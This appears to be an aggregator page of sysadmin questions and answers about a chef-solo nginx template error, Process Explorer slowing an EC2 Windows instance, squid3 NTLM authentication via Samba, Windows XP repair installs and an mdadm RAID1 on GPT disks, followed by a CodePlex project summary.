/usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `loop' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `run_application' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application.rb:67:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/bin/chef-solo:25:in `<top (required)>' /usr/bin/chef-solo:19:in `load' /usr/bin/chef-solo:19:in `<main>' [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Running exception handlers [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Exception handlers complete [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Stacktrace dumped to /var/chef-solo/chef-stacktrace.out [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Errno::ENOENT: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) What am I doing incorrectly?
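    The traceback shows the failure happens when the rendered temp file is renamed into /etc/nginx/sites-available/default, and ENOENT at that point usually means the target directory itself is missing; the Amazon Linux nginx package ships a conf.d-style layout rather than the Debian-style sites-available/sites-enabled layout the Opscode cookbook writes into. A quick check and workaround, as a sketch (the -c path to solo.rb is an assumption):

        # Confirm whether the directory the template writes into actually exists
        ls -ld /etc/nginx /etc/nginx/sites-available /etc/nginx/sites-enabled

        # If it is missing, create the layout the cookbook expects and re-run
        mkdir -p /etc/nginx/sites-available /etc/nginx/sites-enabled
        chef-solo -c /etc/chef/solo.rb -j /etc/chef/dna.json

    The cleaner long-term fix is to have the recipe manage those directories (or to use a cookbook that supports the Amazon/RHEL layout), so the run is idempotent on a fresh instance.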

    Read the article

  • Why does Process Explorer cause highly targeted failure of some applications / basic UI functions in a high-power EC2 Windows instance?

    - by Dan Nissenbaum
    Update: I have determined that Process Explorer itself - the program I am using to debug a performance issue - seems to be the cause of the issue. See note, with updated question, at end. I am running a high-power (cc2.8xlarge) Amazon AWS EC2 Windows instance off of a boot EBS volume, provisioned at 2500 PIOPS, which was created from a snapshot of a previous boot volume. My purpose with the instance is to use it as a development workstation with many developer tools installed, such as Visual Studio, a local XAMPP stack, etc. I have upwards of 40 programs installed on the machine. The usability of the instance as a development machine often works quite well. The RDP lag is adequately small. I have used it for hours on end without problems for some of my most intense development tasks. As a result, I have just purchased a reserved instance, and I opted to rebuild my development machine starting from scratch with a Windows Server 2012 AMI. After having installed all of my desired/required applications for development over this past week, again the machine seems to often work well and I have worked for up to an hour at a time without problems doing heavy development work. However, I continue to run into catastrophic OS usability issues that may prevent me from being able to rely on this machine as a development machine. I would like to track down the source of the problem, if there is an easily identifiable source. (Update: I have tracked down the source to be Process Explorer, the very program I was using to debug the problem. See update at end.) The issues are as follows. (These are some primary examples) Some applications, after a period of adequate responsiveness, suddenly begin to respond very, very slowly to basic user interface actions such as clicking on menus and pressing Ctrl-Tab to switch between open documents. Two examples are UltraEdit and PhpEd. It typically takes ~2 seconds for a menu to appear, and ~4 seconds to switch between open documents. Additionally, insertion point motion in the editor is lagged by upwards of ~2 seconds. Process Explorer, which I am using to help debug the problem, seems to run acceptably for a couple of minutes, but on multiple occasions Process Explorer itself hangs completely. It hangs at the same time as the problems noted above. When it hangs, it is 100% unresponsive. Clicking on its taskbar icon neither causes it to come to the top or go behind, and its viewable area is filled with nothing but a region partially containing pure white and partially containing incomplete windows widgets that are unreadable, and that never change. Waiting 10 minutes does not clear the problem. Attempting to force-quit Process Explorer by right-clicking on its taskbar icon and choosing "Close Window" takes about 5 full minutes to exit (Process Explorer itself can't be used to exit Process Explorer, and it is registered as a Task Manager substitute). Other programs work just fine during this time. For example, Chrome tabs flip very quickly back and forth, menus pop open instantly, web pages load quickly, and typing in forms/web applications inside the browser works promptly. Another example of an application that works crisply is Filemaker - its menus open instantly, and switching views in this application occurs promptly. Other applications also work without issue. Also, switching between applications occurs promptly as well. It is only a handful of applications that exhibit the problem, with some primary examples given above. 
At first I thought that EBS IOPS might be a problem. Therefore, I ran Performance Monitor, and watched the "Disk Transfers/sec" monitor in real time. At no point did this measure come anywhere close to hitting the 2500 PIOPS provisioned for the EBS volume. The RAM was also well under the limit (~10 GB used out of 60 GB). I did notice that one CPU core (out of 32 logical cores) was fully thrashing at 100% (i.e., ~3.1%) during the problematic periods. This seems to indicate that a single CPU core is handling the menus / flipping between open documents (for some applications only) / managing the Process Explorer user interface, and that this single core was hosed for some reason during the problematic periods. Also note that I have a desktop workstation (Windows 7) that I also use as a development machine, via a remote connection, with a nearly identical set of programs installed, and this desktop workstation does not exhibit any of the problems I've discussed above. I have been using it heavily for well over a year now. Any suggestions regarding either the source of the problem, or steps I might take to investigate the source of the problem, would be appreciated. Thanks. Note: After extensive testing & investigation, I have noticed that when I quit Process Explorer, the problem vanishes and the system performance returns to normal, and then reappears quickly when I run Process Explorer again (note: again, the performance problems only appear for a subset of applications - other applications work perfectly fine during the same period). My question is therefore (thankfully) more specific: Why does Process Explorer cause highly targeted failure of some applications (including itself) and basic UI functions, in a high-power EC2 Windows instance?

    Read the article

  • squid3 auth thru samba using ntlm to AD doesn't work

    - by derty
    Some users here are spending too much time exploring the WWW, so the big boss wants to get this under control. We use squid3 for security reasons and the caching benefits, and now I'm trying to set up a new proxy on a different server (Debian 6). Permissions are defined in AD, and squid3 should get its authentication through samba/winbind using the NTLM protocol, but I get "Access Denied" every time. It only works using LDAP, but that's not the way I need it. Here are some logs and confs. squid access.log 1326878095.784 1 192.168.15.27 TCP_DENIED/407 4049 GET http://at.msn.com/? -NONE/- text/html 1326878095.791 1 192.168.15.27 TCP_DENIED/407 4294 GET http://at.msn.com/? - NONE/- text/html 1326878095.803 9 192.168.15.27 TCP_DENIED/403 4028 GET http://at.msn.com/? kavan NONE/- text/html 1326878095.848 0 192.168.15.27 TCP_DENIED/403 3881 GET http://www.squid-cache.org/Artwork/SN.png kavan NONE/- text/html 1326878100.279 0 192.168.15.27 TCP_DENIED/403 3735 GET http://www.google.at/ kavan NONE/- text/html 1326878100.296 0 192.168.15.27 TCP_DENIED/403 3870 GET http://www.squid-cache.org/Artwork/SN.png kavan NONE/- text/html 1326878155.700 0 192.168.15.27 TCP_DENIED/407 4072 GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml - NONE/- text/html 1326878155.705 2 192.168.15.27 TCP_DENIED/407 4317 GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml - NONE/- text/html 1326878155.709 3 192.168.15.27 TCP_DENIED/403 4026 GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml kavan NONE/- text/html squid cache.log 2012/01/18 10:12:49| Creating Swap Directories 2012/01/18 10:12:49| Starting Squid Cache version 3.1.6 for x86_64-pc-linux-gnu... 2012/01/18 10:12:49| Process ID 17236 2012/01/18 10:12:49| With 65535 file descriptors available 2012/01/18 10:12:49| Initializing IP Cache...
2012/01/18 10:12:49| DNS Socket created at [::], FD 7 2012/01/18 10:12:49| DNS Socket created at 0.0.0.0, FD 8 2012/01/18 10:12:49| Adding nameserver 192.168.15.2 from /etc/resolv.conf 2012/01/18 10:12:49| Adding nameserver 192.168.15.19 from /etc/resolv.conf 2012/01/18 10:12:49| Adding nameserver 192.168.15.1 from /etc/resolv.conf 2012/01/18 10:12:49| Adding domain schoenbrunn.local from /etc/resolv.conf 2012/01/18 10:12:49| helperOpenServers: Starting 5/5 'squid_ldap_auth' processes 2012/01/18 10:12:49| helperOpenServers: Starting 10/10 'ntlm_auth' processes 2012/01/18 10:12:49| helperOpenServers: Starting 10/10 'squid_kerb_auth' processes 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| helperOpenServers: Starting 5/5 'squid_ldap_group' processes 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| Unlinkd pipe opened on FD 73 2012/01/18 10:12:49| Local cache digest enabled; rebuild/rewrite every 3600/3600 sec 2012/01/18 10:12:49| Store logging disabled 2012/01/18 10:12:49| Swap maxSize 0 + 262144 KB, estimated 20164 objects 2012/01/18 10:12:49| Target number of buckets: 1008 2012/01/18 10:12:49| Using 8192 Store buckets 2012/01/18 10:12:49| Max Mem size: 262144 KB 2012/01/18 10:12:49| Max Swap size: 0 KB 2012/01/18 10:12:49| Using Least Load store dir selection 2012/01/18 10:12:49| Set Current Directory to /var/spool/squid3 2012/01/18 10:12:49| Loaded Icons. 2012/01/18 10:12:49| Accepting HTTP connections at [::]:3128, FD 74. 2012/01/18 10:12:49| HTCP Disabled. 2012/01/18 10:12:49| Squid modules loaded: 0 2012/01/18 10:12:49| Adaptation support is off. 2012/01/18 10:12:49| Ready to serve requests. 
2012/01/18 10:12:50| storeLateRelease: released 0 objects smb.conf # Domain Authntication Settings workgroup = <WORKGROUP> security = ads password server = <DOMAINNAME>.LOCAL realm = <DOMAINNAME>.LOCAL ldap ssl = no # logging log level = 5 max log size = 50 # logs split per machine log file = /var/log/samba/%m.log # max 50KB per log file, then rotate ; max log size = 50 # User settings username map = /etc/samba/smbusers idmap uid = 10000-20000000 idmap gid = 10000-20000000 idmap backend = ad ; template primary group = <ad group> template shell = /sbin/nologin # Winbind Settings winbind separator = + winbind enum users = Yes winbind enum groups = Yes winbind netsted groups = Yes winbind nested groups = Yes winbind cache time = 10 winbind use default domain = Yes #Other Globals unix charset = LOCALE server string = <SERVERNAME> load printers = no printing = cups cups options = raw ; printcap name = /etc/printcap #obtain list of printers automatically on SystemV ; printcap name = lpstat ; printing = cups squid.conf auth_param ntlm program /usr/bin/ntlm_auth --require-membership-of=<DOMAINNAME>\\INTERNETZ --helper-protocol=squid-2.5-ntlmssp auth_param ntlm children 10 auth_param basic program /usr/lib/squid3/squid_ldap_auth -R -b "dc=<dcname>,dc=local" -D "cn=administrator,cn=Users,dc=<domainname>,dc=local" -w "******" -f sAMAccountName=%s -h 192.168.15.19:3268 auth_param basic realm "Proxy Authentifizierung. Bitte geben Sie Ihren Benutzername und Ihr Passwort ein!" #means insert you PW in an other language - # external_acl_type InetGroup %LOGIN /usr/lib/squid3/squid_ldap_group -R -b "dc=<domainname>,dc=local" -D "cn=administrator,cn=Users,dc=<domainname>,dc=local" -w "******" -f "(&(objectclass=person)(sAMAccountName=%v) (memberof=cn=%a,cn=internetz,dc=<domainname>,dc=local))" -h 192.168.15.19:3268 auth_param negotiate program /usr/lib/squid3/squid_kerb_auth -d auth_param negotiate children 10 auth_param negotiate keep_alive on acl localnet proxy_auth REQUIRED acl InetAccess external InetGroup Internetz http_access allow InetAccess http_access deny all acl auth proxy_auth REQUIRED http_access allow auth Also, something very suspicious: after adding the proxy server to the domain I see two new computer entries, one with the original computer name leopoldine and one named leopoldine CNF:f8efa4c4-ff0e-4217-939d-f1523b43464d ?!? I have tried a lot, really, but I'm stuck on this problem. I actually even reinstalled all the dependent programs and reconfigured them from the defaults. The group exists and has me in it. Firefox runs against the old proxy and I use IE for testing the new one, but I get "Access Denied" every time. To be honest I'm quite a beginner, so please bear with me; I'm keen to improve, and I'll gather whatever information is needed to fix this, but I started this job 2 months ago with only 1.5 years of training and not a single second of it on Linux ;)
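    Before changing squid.conf further, it is worth confirming that winbind itself can answer NTLM requests for the squid helper, since a 407 followed by a 403 for an already-identified user (kavan) points at the helper or the group lookup rather than at the browser. A sketch of the usual checks, reusing the names from the configuration above:

        # Is the machine account join still healthy?
        net ads testjoin
        wbinfo -t                  # verify the trust secret
        wbinfo -u | head           # can winbind enumerate domain users?
        id kavan                   # does the user's group list include INTERNETZ?

        # Run the same helper squid uses, by hand (it prompts for the password
        # and should answer NT_STATUS_OK)
        /usr/bin/ntlm_auth --username=kavan \
            --require-membership-of='<DOMAINNAME>\INTERNETZ'

        # squid's ntlm_auth helper must be able to read winbind's privileged pipe;
        # the owning group varies by distribution, so check it and add the squid
        # runtime user (proxy on Debian) to that group if needed
        ls -ld /var/run/samba/winbindd_privileged

    Note also that in the quoted squid.conf the http_access deny all line comes before http_access allow auth, so that final rule can never match, and the duplicated computer account (leopoldine plus a CNF: copy) usually indicates a conflict object in AD from the machine being joined twice; it is worth cleaning that up before re-joining with net ads join.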

    Read the article

  • Windows installation repair option not showing up

    - by Carl
    I'm trying to repair an existing Windows XP installation. Following the instructions from http://www.microsoft.com/windowsxp/using/helpandsupport/learnmore/tips/doug92.mspx this should work: When the Press any key to boot from CD message is displayed on your screen, press a key to start your computer from the Windows XP CD. Press ENTER when you see the message To setup Windows XP now, and then press ENTER displayed on the Welcome to Setup screen. Do not choose the option to press R to use the Recovery Console. In the Windows XP Licensing Agreement, press F8 to agree to the license agreement. Make sure that your current installation of Windows XP is selected in the box, and then press R to repair Windows XP. Follow the instructions on the screen to complete Setup. On step 5 pressing R does nothing and there is nothing on the screen saying it would. When I just select to install I get a message that a previous installation is there and proceeding will destroy it and installed applications, I can optionally select a directory other than c:\windows, and I can optionally format before continuing. I had tried to go from SP2-SP3. It failed, and then I couldn't get to Safe Mode. I put the SP1 disk back in to do a repair, and I don't see that option. (I don't have an SP2 boot/install disk, I just have the non-boot upgrade package.) UPDATE: Upon loading the Recovery Console, I get a message saying The system registry does not appear to have an active ControlSet key. The system registry may be damaged. You can try restarting it with the Last Known Good configuration or you can try repairing the installation of Windows using the setup program's repair and recovery options. I then did bootcfg /scan - "successful" ... Total installs: 1 ... [1] c:\windows - with the c:\windows command prompt below it. bootcfg /list gives [1] Windows XP Pro; OS Load Options /noexecute=optin /fastdetect; OS Location: c:\windows I followed the instructions at http://michaelstevenstech.com/XPrepairinstall.htm - "Warning 2" link copy E:\i386\ntldr C:\ copy E:\i386\ntdetect.com C:\ attrib -h -r -s C:\boot.ini del C:\boot.ini BootCfg /Rebuild I added /fastdetect when it asked for options. I re-ran Windows setup - no change - no repair option. UPDATE: I followed the procedure at http://support.microsoft.com/default.aspx?scid=kb;en-us;307545 I rebooted. I now get a quick message on bootup to select the boot - 1: [blank] ; Windows XP Professional ; Windows Recover Console. The "1: " is new. The rest is the way it was when all was okay. Selecting 1: and the next one gives the same result - I get to a login icon, and then it asks for a password, with the blinking cursor, but I can't type anything. I reboot with the Windows CD. Now I see a repair option for installation "1: " I selected R on that, and it did "Setup is copying files..." and rebooted when it was done. Then it booted, and I got a window saying "Setup will complete in approximately 39 minutes." That's where I am now. I wasn't expecting this last part - I did a repair several months ago and I don't recall that. UPDATE: Booted up. Asked if I wanted to register Windows online. All my icons are there, and the old desktop documents. Good. All the applications I tried from the Start Menu work (tested a few), except Corel Photopaint - I get registry entry not found errors. Windows ran for a while, then froze. The mouse and keyboard don't work. Pressing the power button got Windows to shut down. 
I probably need to put SP2 on it, and then all the updates for my laptop for XP Pro SP2 (drivers); there's a bunch. The mouse and keyboard quit working again; that wasn't a problem when I first set up this laptop. It has hung 4 times now: two mouse/keyboard hangs after pressing Ctrl-C (to copy text from a Notepad document), and two after selecting Start-Run (I wasn't able to type anything in the box).

    Read the article

  • Build and migrated to software raid (mdadm) on GPT disk, now can't assemble array

    - by John H
    mdadm, GPT issues, unrecognized partitions. Simplified question: how do I get mdadm to recognize GPT partitions? I have been attempting to convert/copy my Ubuntu 11.10 OS from a single drive to software RAID 1. I have done something similar in the past, but in this case I was adding a drive that had been configured for GPT, and I tried to work with that without fully looking into the implications. Currently, I have a non-booting mdadm RAID 1 array at /dev/md127 (the OS assigned that name and it keeps picking it up). I am booting off of live USB keys, currently System Rescue CD from sysresccd. While gdisk and parted can see all the partitions, most of the OS utilities do not, including mdadm. My main goal is just to make the RAID array accessible so I can pull the data off and start fresh (without using GPT). /dev/md127 /dev/sda /dev/sda1 <- GPT type partition /dev/sda1 <- exists within the GPT part, member of md127 /dev/sda2 <- exists within the GPT part, empty /dev/sdb /dev/sdb1 <- GPT type partition /dev/sdb1 <- exists within the GPT part, member of md127 History: POINT A: The original OS was installed on sda (actually /dev/sda6). I used the Ubuntu live USB to add sdb. I got a warning from fdisk about GPT, so I used gdisk to create a raid partition (sdb1) and mdadm to create a RAID 1 mirror with a missing drive. I had many issues getting this working (including being unable to get grub to install), but I eventually got it to boot using grub on sda and /dev/md127 off of sdb. So at point A, I had copied my OS from sda6 to md127 on sdb. I then booted into a rescue mode and attempted to get a bootloader onto sdb, which failed. I then discovered my mistake: I had installed the raid onto sdb instead of sdb1, essentially overwriting the sdb1 partition. POINT B: I now had two copies of my data: one on md127/sdb, and one on sda. I destroyed the data on sda and created a new GPT table on sda. I then created sda1 for the raid array, and sda2 for a scratch partition. I added sda1 into the raid array and let it rebuild. md127 now covered /dev/sdb and /dev/sda1, fully active and synced. POINT C: I rebooted onto Linux rescue again and was still able to access the raid array. I then removed /dev/sdb from the array and created /dev/sdb1 for the raid. I added sdb1 to the array and let it sync. I was able to mount and access /dev/md127 without issues. Once it completed, both /dev/sda1 and /dev/sdb1 were GPT partitions and actively syncing. POINT D (current): I rebooted again to test whether the array would boot, and grub failed to load. I booted off of my live thumb drive and found that I can no longer assemble the raid array. mdadm doesn't see the required partitions.
-- root@freshdesk /root % uname -a Linux freshdesk 3.0.24-std251-amd64 #2 SMP Sat Mar 17 12:08:55 UTC 2012 x86_64 AMD Athlon(tm) II X4 645 Processor AuthenticAMD GNU/Linux === /proc/partitions and parted look good: root@freshdesk /root % cat /proc/partitions major minor #blocks name 7 0 301788 loop0 8 0 976762584 sda 8 1 732579840 sda1 8 2 244181703 sda2 8 16 732574584 sdb 8 17 732573543 sdb1 8 32 7876607 sdc 8 33 7873349 sdc1 (parted) print all Model: ATA ST31000528AS (scsi) Disk /dev/sda: 1000GB Sector size (logical/physical): 512B/512B Partition Table: gpt Number Start End Size File system Name Flags 1 1049kB 750GB 750GB ext4 2 750GB 1000GB 250GB Linux/Windows data Model: ATA SAMSUNG HD753LJ (scsi) Disk /dev/sdb: 750GB Sector size (logical/physical): 512B/512B Partition Table: gpt Number Start End Size File system Name Flags 1 1049kB 750GB 750GB ext4 Linux RAID raid Model: SanDisk SanDisk Cruzer (scsi) Disk /dev/sdc: 8066MB Sector size (logical/physical): 512B/512B Partition Table: msdos Number Start End Size Type File system Flags 1 31.7kB 8062MB 8062MB primary fat32 boot, lba === # no sda2, and I double the sdb1 is the one shown in parted root@freshdesk /root % blkid /dev/loop0: TYPE="squashfs" /dev/sda1: UUID="75dd6c2d-f0a8-4302-9da4-792cc7d72355" TYPE="ext4" /dev/sdc1: LABEL="PENDRIVE" UUID="1102-3720" TYPE="vfat" /dev/sdb1: UUID="2dd89f15-65bb-ff88-e368-bf24bd0fce41" TYPE="linux_raid_member" root@freshdesk /root % mdadm -E /dev/sda1 mdadm: No md superblock detected on /dev/sda1. # this is probably a result of me attempting to force the array up, putting superblocks on the GPT partition root@freshdesk /root % mdadm -E /dev/sdb1 /dev/sdb1: Magic : a92b4efc Version : 0.90.00 UUID : 2dd89f15:65bbff88:e368bf24:bd0fce41 Creation Time : Fri Mar 30 19:25:30 2012 Raid Level : raid1 Used Dev Size : 732568320 (698.63 GiB 750.15 GB) Array Size : 732568320 (698.63 GiB 750.15 GB) Raid Devices : 2 Total Devices : 2 Preferred Minor : 127 Update Time : Sat Mar 31 12:39:38 2012 State : clean Active Devices : 1 Working Devices : 2 Failed Devices : 1 Spare Devices : 1 Checksum : a7d038b3 - correct Events : 20195 Number Major Minor RaidDevice State this 2 8 17 2 spare /dev/sdb1 0 0 8 1 0 active sync /dev/sda1 1 1 0 0 1 faulty removed 2 2 8 17 2 spare /dev/sdb1 === root@freshdesk /root % mdadm -A /dev/md127 /dev/sda1 /dev/sdb1 mdadm: no recogniseable superblock on /dev/sda1 mdadm: /dev/sda1 has no superblock - assembly aborted root@freshdesk /root % mdadm -A /dev/md127 /dev/sdb1 mdadm: cannot open device /dev/sdb1: Device or resource busy mdadm: /dev/sdb1 has no superblock - assembly aborted
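    For what it's worth, mdadm does not care whether a member partition lives in an MBR or a GPT table; it only looks for its own superblock. The output above shows that sdb1 still carries a 0.90 superblock while sda1 no longer has one (as noted, probably from forcing the array up), and that something is holding sdb1 busy. A recovery sketch, assuming the copy of the data you want to keep is the one on sdb1:

        # See whether a half-assembled array is holding sdb1 busy, then release it
        cat /proc/mdstat
        mdadm --stop /dev/md127

        # Try to start the mirror degraded from the member that still has a superblock
        # (mdadm may refuse if the metadata really does mark sdb1 as a spare)
        mdadm --assemble --run /dev/md127 /dev/sdb1

        # Fallback for data recovery: 0.90 metadata sits at the END of the partition,
        # so a RAID1 member is usually mountable read-only on its own
        mkdir -p /mnt/recover
        mount -o ro /dev/sdb1 /mnt/recover || mount -o ro /dev/md127 /mnt/recover

    Once the data is copied off, rebuilding the array from scratch with fresh superblocks on both partitions is simpler than trying to repair the inconsistent 0.90 metadata in place.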

    Read the article

  • CodePlex Daily Summary for Monday, March 01, 2010

    CodePlex Daily Summary for Monday, March 01, 2010New ProjectsActiveWorlds World Server Admin PowerShell SnapIn: The purpose of this PowerShell SnapIn is to provide a set of tools to administer the world server from PowerShell. It leverages the ActiveWorlds S...AWS SimpleDB Browser: A basic GUI browser tool for inspection and querying of a SimpleDB.Desktop Dimmer: A simple application for dimming the desktop around windows, videos, or other media.Disk Defuzzer: Compare chaos of files and folders with customizable SQL queries. This little application scans files in any two folders, generates data in an A...Dynamic Configuration: Dynamic configuration is a (very) small library to provide an API compatible replacement for the System.Configuration.ConfigurationManager class so...Expression Encoder 3 Visual Basic Samples: Visual Basic Sample code that calls the Expression Encoder 3 object model.Extended Character Keyboard: An lightweight onscreen keyboard that allows you to enter special characters like "á" and "û". Also supports adding of 7 custom buttons.FileHasher: This project provides a simple tool for generating and verifying file hashes. I created this to help the QA team I work with. The project is all C#...Fluent Assertions: Fluent interface for writing more natural specifying assertions with more clarity than the traditional assertion syntax such as offered by MSTest, ...Foursquare BlogEngine Widget: A Basic Widget for BlogEngine which displays the last foursquare Check-insGraffiti CMS Events Plugin: Plugin for Graffiti CMS that allows creating Event posts and rendering an Event CalendarHeadCounter: HeadCounter is a raid attendance and loot tracking application for World of Warcraft.HRM Core (QL Nhan Su): This is software about Human Resource Management in Viet Nam ------------ Đây là phần mềm Quản lý nhân sự tiền lương ở Việt Nam (Nghiệp vụ ở Việt Nam)IronPython Silverlight Sharpdevelop Template: This IronPython Silverlight SharpDevelop Template makes it easier for you to make Silverlight applications in IronPython with Sharpdevelop.kingbox: my test code for study vs 2005link_attraente: Projeto Conclusão de CursoORMSharp.Net: ORMSharp.Net https://code.google.com/p/ormsharp/ http://www.sqlite.org/ http://sqlite.phxsoftware.com/ http://sourceforge.net/projects/sqlite-dotnet2/Orz framework: Orz framework is more like a helpful library, if you are develop with DotNet framework 3.0, it will be very useful to you. Orz framework encapsul...OTManager: OTManagerSharePoint URL Ping Tool: The Url Ping Tool is a farm feature in SharePoint that provide additional performance and tracing information that can be used to troubleshoot issu...SunShine: SunShine ProjectToolSuite.ValidationExpression: assembly with regular expression for the RegularExpressionValidator controlTwitual Studio: A Visual Studio 2010 based Twitter client. Now you have one less reason for pressing Alt+Tab. Plus you still look like you're working!Velocity Hosting Tool: A program designed to aid a HT Velocity host in hosting and recording tournaments.Watermarker: Adds watermark on pictures to prevent copy. Icon taken from PICOL. Can work with packs of images.Zack's Fiasco - ASP.NET Script Includer: Script includer to * include scripts (JS or CSS) once and only once. * include the correct format by differentiating between release and build. 
Th...New ReleasesAll-In-One Code Framework: All-In-One Code Framework 2010-02-28: Improved and Newly Added Examples:For an up-to-date list, please refer to All-In-One Code Framework Sample Catalog. Samples for ASP.NET Name ...All-In-One Code Framework (简体中文): All-In-One Code Framework 2010-02-28: Improved and Newly Added Examples:For an up-to-date list, please refer to All-In-One Code Framework Sample Catalog. Latest Download Link: http://c...AWS SimpleDB Browser: SimpleDbBrowser.zip Initial Release: The initial release of the SimpleDbBrowser. Unzip the file in the archive and place them all in a folder, then run the .exe. No installer is used...BattLineSvc: V1: First release of BattLineSvcCC.Votd Screen Saver: CC.Votd 1.0.10.301: More bug fixes and minor enhancements. Note: Only download the (Screen Saver) version if you plan to manually install. For most users the (Install...Dynamic Configuration: DynamicConfiguration Release 1: Dynamic Configuration DLL release.eIDPT - Cartão de Cidadão .NET Wrapper: EIDPT VB6 Demo Program: Cartão de Cidadão Middleware Application installation (v1.21 or 1.22) is required for proper use of the eID Lib.eIDPT - Cartão de Cidadão .NET Wrapper: eIDPT VB6 Demo Program Source: Cartão de Cidadão Middleware Application installation (v1.21 or 1.22) is required for proper use of the eID Lib.ESPEHA: Espeha 10: 1. Help available on F1 and via context menu '?' 2. Width of categiries view is preserved througb app starts 3. Drag'nd'drop for tasks view allows ...Extended Character Keyboard: OnscreenSCK Beta V1.0: OnscreenSCK Beta Version 1.0Extended Character Keyboard: OnscreenSCK Beta V1.0 Source: OnscreenSCK Beta Version 1.0 Source CodeFileHasher: Console Version v 0.5: This release provides a very basic and minimal command-line utility for generating and validating file hashes. The supported command-line paramete...Furcadia Framework for Third Party Programs: 0.2.3 Epic Wrench: Warning: Untested on Linux.FurcadiaLib\Net\NetProxy.cs: Fixed a bug I made before update. FurcadiaFramework_Example\Demo\IDemo.cs: Ignore me. F...Graffiti CMS Events Plugin: Version 1.0: Initial Release of Events PluginHeadCounter: HeadCounter 1.2.3 'Razorgore': Added "Raider Post" feature for posting details of a particular raider. Added Default Period option to allow selection of Short, Long or Lifetime...Home Access Plus+: v3.0.0.0: Version 3.0.0.0 Release Change Log: Reconfiguration of the web.config Ability to add additional links to homepage via web.config Ability to add...Home Access Plus+: v3.0.1.0: Version 3.0.1.0 Release Change Log: Fixed problem with moving File Changes: ~/bin/chs extranet.dll ~/bin/chs extranet.pdbHome Access Plus+: v3.0.2.0: Version 3.0.2.0 Release Change Log: Fixed problem with stylesheet File Changes: ~/chs.masterHRM Core (QL Nhan Su): HRMCore_src: Source of HRMCoreIRC4N00bz: IRC4N00bz v1.0.0.2: There wasn't much updated this weekend. I updated 2 'raw' events. One is all raw messages and the other is events that arn't caught in the dll. 
...IronPython Silverlight Sharpdevelop Template: Version 1 Template: Just unzip it into the Sharpdevelop python templates folder For example: C:\Program Files\SharpDevelop\3.0\AddIns\AddIns\BackendBindings\PythonBi...MDownloader: MDownloader-0.15.4.56156: Fixed handling exceptions; previous handling could lead to freezing items state; Fixed validating uploading.com links;OTManager: Activity Log: 2010.02.28 >> Thread Reopened 2010.02.28 >> Re-organized WBD Features/WMBD Features 2010.02.28 >> Project status is active againPicasa Downloader: PicasaDownloader (41175): NOTE: The previous release was accidently the same as the one before that (forgot to rebuild the installer). Changelog: Fixed workitem 10296 (Sav...PicNet Html Table Filter: Version 2.0: Testing w/ JQuery 1.3.2Program Scheduler: Program Scheduler 1.1.4: Release Note: *Bug fix : If the log window is docked and user moves the log window , main window will move too. *Added menu to log window to clear...QueryToGrid Module for DotNetNuke®: QueryToGrid Module version 01.00.00: This is the initial release of this module. Remember... This is just a proof of concept to add AJAX functionality to your DotNetNuke modules.Rainweaver Framework: February 2010 Release: Code drop including an Alpha release of the Entity System. See more information in the Documentation page.RapidWebDev - .NET Enterprise Software Development Infrastructure: ProductManagement Quick Sample 0.1: This is a sample product management application to demonstrate how to develop enterprise software in RapidWebDev. The glossary of the system are ro...Team Foundation Server Revision Labeller for CruiseControl.NET: TFS Labeller for CruiseControl.NET - TFS 2008: ReleaseFirst release of the Team Foundation Server Labeller for CruiseControl.NET. This specific version is bound to TFS 2008 DLLs.ToolSuite.ValidationExpression: 01.00.01.000: first release of the time validation class; the assembly file is ready to use, the documentation ist not complete;VCC: Latest build, v2.1.30228.0: Automatic drop of latest buildWatchersNET CKEditor™ Provider for DotNetNuke: CKEditor Provider 1.7.00: Whats New FileBrowser: Non Admin Users will only see a User Sub folder (..\Portals\0\userfiles\UserName) CKFinder: Non Admin Users will only see ...Watermarker: Watermarker: first public version. can build watermark only in left top corner on one image at once.While You Were Away - WPF Screensaver: Initial Release: This is the code released when the article went live.Most Popular ProjectsMetaSharpRawrWBFS ManagerAJAX Control ToolkitMicrosoft SQL Server Product Samples: DatabaseSilverlight ToolkitWindows Presentation Foundation (WPF)Microsoft SQL Server Community & SamplesASP.NETDotNetNuke® Community EditionMost Active ProjectsRawrBlogEngine.NETMapWindow GISCommon Context Adapterspatterns & practices – Enterprise LibrarySharpMap - Geospatial Application Framework for the CLRSLARToolkit - Silverlight Augmented Reality ToolkitDiffPlex - a .NET Diff GeneratorRapid Entity Framework. (ORM). CTP 2jQuery Library for SharePoint Web Services

    Read the article

  • CodePlex Daily Summary for Tuesday, March 09, 2010

